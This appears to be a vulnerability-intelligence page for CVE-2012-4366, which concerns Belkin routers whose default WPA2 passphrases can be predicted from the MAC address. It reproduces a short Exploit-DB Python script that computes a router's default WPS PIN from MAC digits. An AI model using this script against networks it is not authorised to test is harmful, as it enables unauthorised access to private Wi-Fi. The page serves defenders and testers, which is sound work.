VIR Vulnerability Intelligence Relay

CVE-2012-4366

low
Published 2012-11-20 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
4.3

Description

Belkin wireless routers Surf N150 Model F7D1301v1, N900 Model F9K1104v1, N450 Model F9K1105V2, and N300 Model F7D2301v1 generate a predictable default WPA2-PSK passphrase based on eight digits of the WAN MAC address, which allows remote attackers to access the network by sniffing the beacon frames.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-38164 remote hardware verified python ยท 1 KB
ZhaoChunsheng ยท 2013-01-03

Belkin Wireless Router - Default WPS PIN Security

python exploit Source: Exploit-DB 
source: https://www.securityfocus.com/bid/57128/info

Belkin Wireless Router is prone to a security vulnerability that may allow attackers to generate a default WPS PIN.

Successfully exploiting this issue may allow attackers to generate the default WPS PIN. This may lead to other attacks.

Belkin N900 F9K1104v1 is vulnerable; other versions may also be affected.

@author       : e.novellalorente@student.ru.nl
Original work : ZhaoChunsheng 04/07/2012
 
'''
 
import sys
 
VERSION    = 0
SUBVERSION = 2
 
def usage():
    print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
    print "[*] Usage : python WPSpin.py 123456"
    sys.exit(0)
 
def wps_pin_checksum(pin):
    accum = 0
 
    while(pin):
        accum += 3 * (pin % 10)
        pin /= 10
        accum += pin % 10
        pin /= 10
    return  (10 - accum % 10) % 10
 
try:
    if (len(sys.argv[1]) == 6):
        p = int(sys.argv[1] , 16) % 10000000
        print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
    else:
        usage()
except Exception:
    usage()

References

CWEs

CWE-310

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.